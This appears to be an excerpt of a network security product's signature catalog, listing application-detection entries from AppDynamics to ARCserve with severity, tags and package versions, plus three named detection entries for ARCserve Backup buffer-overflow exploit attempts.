Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppDynamics focuses on managing the performance and availability of applications across cloud computing environments as well as inside the data center.
Back to top

appFigures

About this situation: Application appFigures detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: appFigures is a reporting platform for mobile developers that automatically downloads and visualizes sales data, App Store reviews, hourly ranks and more.
Back to top

AppFirst

About this situation: Application AppFirst detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppFirst provides web-scale platform for IT to see every event, all the time, across the enterprise.
Back to top

AppFog

About this situation: Application AppFog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppFog, Inc. is a platform-as-a-service provider for Java, Node, Ruby, PHP, MySQL, Mongo, PostgreSQL, and more. AppFog delivers a reliable, scalable and fast platform for deploying apps in the cloud.
Back to top

Appfolio

About this situation: appfolio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: AppFolio gives easy-to-use, web-based software that helps small and mid-sized businesses improve their workflow.
Back to top

Appforma-Always-Marketing

About this situation: Application Appforma-Always-Marketing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Each campaign includes a promotion Appforma creates and traffic Appforma delivers via social posting, email marketing and advertising. Appforma also retains your customers by pushing offers on their birthdays or based on points earned through their purchasing/social activity.
Back to top

AppFutura

About this situation: Application AppFutura detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: AppFutura is a marketplace where mobile platform app developers can meet people or companies that are looking for someone to develop an app project.
Back to top

AppGMS

About this situation: Application AppGMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppGMS - stock management solution for garment industry including importers, wholesalers, and retailers.
Back to top

Appharbor

About this situation: Appharbor usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: AppHarbor is a fully hosted .NET Platform as a Service. AppHarbor can deploy and scale any standard .NET application to the cloud.
Back to top

AppHostNameRegistrationVerifier.exe

About this situation: Endpoint Context Agent based AppHostNameRegistrationVerifier.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process AppHostNameRegistrationVerifier.exe detected. AppHostNameRegistrationVerifier.exe is a used in Microsoft Windows as an App Uri Handlers Registration Verifier.
Back to top

Appian

About this situation: Application Appian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appian is a provider of modern business process management solutions and has helped transform the businesses of over 3.5 million users worldwide.
Back to top

AppInstitute

About this situation: Application AppInstitute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppInstitute is an online App Builder online
Back to top

Applane-CRM

About this situation: Application Applane-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Applane CRM Suite designed for all types of service based organizations, one of its biggest strengths is its robust architecture which has been closely modelled around the needs and requirements of successful service organizations.
Back to top

Applane-for-Business

About this situation: Application Applane-for-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Applane is a web-based integrated software suite for managing all your organizational functions.
Back to top

Apple

About this situation: Apple usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1793-5242
Description: Apple online services usage has been detected.
Back to top

Apple Push Notification

About this situation: Endpoint Context Agent based Apple Push Notification
Context: EI Correlation
Severity: 1
Tags: Mobile Software, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Apple Push Notification Service endpoint application has been detected. Apple Push Notification service delivers notifications and status to mobile devices.
Back to top

Apple Software Update

About this situation: Endpoint Context Agent based Apple Software Update
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Apple Software Update endpoint application has been detected. Apple Software Update service keeps Apple's end user software, such as iTunes client, updated.
Back to top

Apple TV

About this situation: Apple TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Description: Apple TV is a digital media player and microconsole. This application situation is meant for blocking the application.
Back to top

Apple-Community

About this situation: Application Apple-Community detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Apple community is concerned with the company Apple Inc. and its products.
Back to top

Apple-Developer

About this situation: Apple Developer service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple Developer service usage has been detected.
Back to top

Apple-FaceTime

About this situation: Apple FaceTime usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1793-5242
Description: Apple FaceTime is a proprietary video chat product.
Back to top

Apple-Filing-Protocol

About this situation: Apple Filing Protocol (AFP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-628-5211
Description: AFP offers file services for Apple devices.
Back to top

Apple-Game-Center

About this situation: Apple Game Center usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1638-5242
Description: Apple Game Center usage has been detected.
Back to top

Apple-iAd

About this situation: Apple iAd usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-769-5211
Description: Apple iAd is an on-line advertising service.
Back to top

Apple-iCloud

About this situation: Apple iCloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1638-5242
Description: Apple iCloud is a cloud storage and cloud computing service.
Back to top

Apple-iMessage

About this situation: Apple iMessage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1692-5242
Description: iMessage is a proprietary chat application.
Back to top

Apple-Infrastructure

About this situation: Apple Servers usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-939-5242
Last changed: sgpkg-ips-1793-5242
Description: This application signature tracks the host ip addresses referring to Apple servers worldwide.
Back to top

Apple-iOS-Connectivity-Check

About this situation: Apple iOS connectivity check detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple iOS internet connectivity check has been detected.
Back to top

Apple-iOS-Services

About this situation: Apple iOS services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-632-5211
Description: Apple iOS/iPhone services usage has been detected.
Back to top

Apple-iOS-Stocks

About this situation: Apple iOS Stocks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple iOS Stocks application usage has been detected.
Back to top

Apple-iOS-Weather

About this situation: Apple iOS Weather usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple iOS Weather application usage has been detected.
Back to top

Apple-iTunes

About this situation: Apple iTunes usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1692-5242
Description: iTunes is a free proprietary application by Apple. It lets users organize and play digital music and video on the computer. It can automatically download new music, app, and book purchases across all supported devices and computers.
Back to top

Apple-iTunes-Sync

About this situation: Apple iTunes device synchronization detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-759-5211
Description: Apple iTunes is a proprietary media player application. It is also used to manage Apple's mobile devices.
Back to top

Apple-Location-Services

About this situation: Apple Location Services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple Location Services usage has been detected.
Back to top

Apple-Mac-App-Store

About this situation: Apple Software Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple Mac App Store is an online application software store for desktop Mac computers.
Back to top

Apple-Maps

About this situation: Apple Maps service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-754-5211
Description: Apple Maps service usage has been detected.
Back to top

Apple-Mobile-Software-Update

About this situation: Apple Mobile Software Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1692-5242
Description: Apple Mobile Software Update usage has been detected.
Back to top

Apple-MobileMe

About this situation: Apple MobileMe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-773-5211
Description: Apple MobileMe usage has been detected.
Back to top

Apple-Online-Certificate-Status-Service

About this situation: Apple Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1692-5242
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates).
Back to top

Apple-PhotoStream

About this situation: Apple PhotoStream usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1638-5242
Description: Apple PhotoStream is a cloud storage and sharing service for photos.
Back to top

Apple-Push-Notification-Service

About this situation: Apple Push Notification Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1692-5242
Description: Apple Push Notification Service (APNs) is a remote notification service provided by Apple Inc. for iOS and OS X devices. The APNs enables delivery of notification for apps independent to their running state.
Back to top

Apple-Radar

About this situation: Apple Radar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Apple Radar is a bug reporting facility.
Back to top

Apple-Siri

About this situation: Apple Siri usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1692-5242
Description: Siri is a voice recognition and control feature of Apple's iOS devices.
Back to top

Apple-Software-Update

About this situation: Apple Software Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1692-5242
Description: Apple Software Update is an application that allows users to find the latest updates and drivers for programs or applications by Apple, for Mac and Windows operating systems.
Back to top

Apple-XProtect-Update

About this situation: Apple XProtect Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1692-5242
Description: Apple XProtect or File Quarantine update usage has been detected.
Back to top

Applejuice

About this situation: AppleJuice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: This application is a semi-centralized peer-to-peer client used for file sharing in a network.
Back to top

ApplicantPRO

About this situation: Application ApplicantPRO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ApplicantPRO is an employer careers sites online application tracking system for small business 50-1000 employees.
Back to top

Applicantstack

About this situation: ApplicantStack usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: ApplicantStack is an affordable web-based applicant tracking system designed help businesses recruit, hire, and grow.
Back to top

Application and Software Download

About this situation: Sites that enable download of software, applications.
Context: URL Application Context
Severity: 1
Tags: Productivity, Network Bandwidth Loss, Productivity Loss, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable download of software, applications.
Back to top

Application-No-Data

About this situation: TCP connection with no data
Context: Application Context
Severity: 1
Tags: Protocols
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1098-5242
Description: The TCP connection contained no data in either direction. This could be, for example, an unused connection that HTTP browser opened in advance.
Back to top

Application-Unknown

About this situation: Unknown application
Context: Application Context
Severity: 1
Tags: Protocols
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-420-4219
Description: The application that the connection uses is unknown. There may not be an identification method for this application, or not enough data has been seen yet in the connection. If TLS decrypting is forbidden, some applications cannot be identified.
Back to top

Applicloud

About this situation: Application Applicloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Applicloud products-is solution for online communication with colleagues, partners and customers.
Back to top

Appliedis

About this situation: Application Appliedis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AIS
Back to top

AppMakr

About this situation: Application AppMakr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppMakr.com is a do-it-yourself platform to create content-based native mobile apps for iPhone and Android, as well as HTML5 Mobile Websites.
Back to top

AppNexus

About this situation: AppNexus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: AppNexus usage detected. AppNexus is an online advertisement and statistics collection service.
Back to top

Appnomic

About this situation: Application Appnomic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appnomic Systems is an application performance management provider to simplify and automate IT through Software and related services.
Back to top

Appointment-Plus

About this situation: Application Appointment-Plus detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appointment-Plus appointment scheduling software includes powerful automation and reporting functions to meet the demands of enterprise businesses.
Back to top

Appointy

About this situation: Application Appointy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appointy is a scheduling software designed to help you grow and manage your business. Appointy allows you to accept appointments online, send automated email
Back to top

AppOnTheRun

About this situation: Application AppOnTheRun detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppOnTheRun offers: photo documentation, GPS tracking, digital work orders, and automated invoicing. It also features secure customer portal for review of service record and on-line bill payment.
Back to top

Appraisal-Smart

About this situation: Application Appraisal-Smart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appraisal Smart is a sophisticated web-based solution to managing employee performance and appraisals/reviews. It also includes Goal Management, 360-Degree Feedback, Learning (LD) Management, and online Job Descriptions aligned with performance appraisals.
Back to top

Apprenda

About this situation: Application Apprenda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apprenda provides an enterprise Platform as a Service
Back to top

Apprise

About this situation: Application Apprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apprise is a provider of enterprise resource planning
Back to top

AppRiver

About this situation: Application AppRiver detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppRiver offers secure business email hosting with cloud-based email and Web protection against spam, viruses and malware.
Back to top

APPSeCONNECT

About this situation: Application APPSeCONNECT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: APPSeCONNECT provides online retail businesses integrating ERP with eCommerce, marketplace and CRM.
Back to top

AppSense

About this situation: Application AppSense detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppSense is provider of enterprise workspace management solutions that enable productive, secure workforces across desktop and mobile environments.
Back to top

Appsflyer

About this situation: Appsflyer webapp data collector
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Description: Appsflyer create in-app experiences that drive loyalty and revenue. Collects data forproduct decisions and measurements of user behaviour.
Back to top

Appshore

About this situation: AppShore usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-636-5211
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

AppSignal

About this situation: Application AppSignal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AppSignal tracks throughput, response times and error rates for your Ruby on Rails apps.
Back to top

Appsplit

About this situation: appsplit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Appsplit has three campaign types, Fund campaign(Set a goal, some rewards and launch a campaign to fund your project.), Sell campaign (list some information about app and put it up for sale on the site.) and Develop campaign (find freelancers of all kind to help work on the app.).
Back to top

Appterra

About this situation: Application Appterra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appterra provides you and your business partners with inventory visibility throughout the supply chain. A feature-rich access portal provides users with an easy-to-use interface for creating, sending, and viewing documents. The application can synchronize replenishment schedules with the latest inventory and usage information.
Back to top

Apptio

About this situation: Application Apptio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apptio is a suite of cloud applications that gives you the facts you need to make faster business-aligned decisions and communicate IT value.
Back to top

Apptivo-Financials

About this situation: Application Apptivo-Financials detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apptivo's Invoices App allows users to generate professional invoices automatically and easily import any relevant information directly from other Apptivo Apps (such as Customers App, Orders App, Items App, Projects App, etc).
Back to top

Apptix

About this situation: Application Apptix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apptix is the provider of hosted business communication, collaboration, and IT solutions to businesses of all sizes - from SOHO to Fortune 500 - with particular expertise supporting legal, financial, healthcare, and telecom firms.
Back to top

Appy-Pie

About this situation: Application Appy-Pie detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appy Pie provides App Builder Software that allows to create an App with No Coding Skills.
Back to top

Aprimo

About this situation: Application Aprimo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aprimo is an integrated marketing software and applications. (Become Teradata)
Back to top

Apruve

About this situation: Application Apruve detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apruve is a payment and communication platform connecting B2B eCommerce buyers and sellers.
Back to top

APS-Payroll

About this situation: Application APS-Payroll detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: APS Payroll a single-platform online payroll processing and reporting product that has grown with the company to now include key elements of workforce management such as timekeeping and human resources.
Back to top

Apsalar

About this situation: Apsalar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Apsalar is an on-line advertising service.
Back to top

Apsis-Newsletter-Pro

About this situation: Application Apsis-Newsletter-Pro detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: APSIS develop services that allow companies and organisations to communicate with their target groups.
Back to top

APT-Package-Manager

About this situation: APT Package Manager usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-595-5211
Description: APT (Advanced Packaging-Tool) is a free user interface to handle the installation and removal of software on the Debian GNU/Linux distribution and its variants. Source: Wikipedia.
Back to top

Aptare

About this situation: Application Aptare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: APTARE provides enterprise storage reporting, monitoring, and alerting software products.
Back to top

Aptean

About this situation: Application Aptean detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aptean provides software and services enabling organizations to achieve continuous business process.
Back to top

Aptify-Membership

About this situation: Application Aptify-Membership detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Aptify system allows organizations to engage their members and staff to focus on achieving their core mission
Back to top

Apttus

About this situation: Application Apttus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apttus delivers Software as a Service (SaaS) applications, allowing you to rapidly and simply deploy enterprise class applications. The functionality allows you to gain complete visibility and end to end management of your business function.
Back to top

Aqilla

About this situation: Application Aqilla detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aqilla is an online accounting software solution.
Back to top

AQL

About this situation: Application AQL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: aql specialise in providing secure, reliable wholesale access to the fixed and mobile networks to government, enterprise and to innovators.
Back to top

AquaCRM-Software

About this situation: Application AquaCRM-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AquaCRM empowers organizations with a complete customer relationship lifecycle management for managing organization-wide Sales, Marketing, Customer Support along with Inventory Management in a single business system.
Back to top

Aquilauk

About this situation: Application Aquilauk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aquilaheywood is the supplier of life and pensions administration software systems in Europe.
Back to top

Arca24

About this situation: Application Arca24 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arca24.com is an IT company which specialized in developing cloud softwares for human resources. It provides tools for tracking and talent management systems based on a semantic engine.
Back to top

Arcade-Town

About this situation: Arcade Town usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Archdiocese-of-Cincinnati-Blackboard-Learn

About this situation: Application Archdiocese-of-Cincinnati-Blackboard-Learn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Carroll High School provides students and parents with a communication system called Blackboard. This system is made available for us to purchase through the Archdiocese of Cincinnati in a project called Extend.
Back to top

ArcherPoint

About this situation: Application ArcherPoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ArcherPoint provides dynamics NAV solution design, development, and upgrades in accounting, manufacturing, retail, distribution.
Back to top

Archlord

About this situation: Archlord usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Archlord is a 3D fantasy massively multiplayer online role-playing game. Source: Wikipedia
Back to top

ARCserve

About this situation: ARCserve traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1212-5242
Description: ARCserve is a backup software product.
Back to top

ARCserve_CS-Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA BrightStor ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, Computer Associates Protection Suite Server, Computer Associates BrightStor Mobile Backup, Computer Associates Unicenter DMS Manager, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-Code-Execution
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-BOF-2

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-279-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-Code-Execution
Description:
Back to top

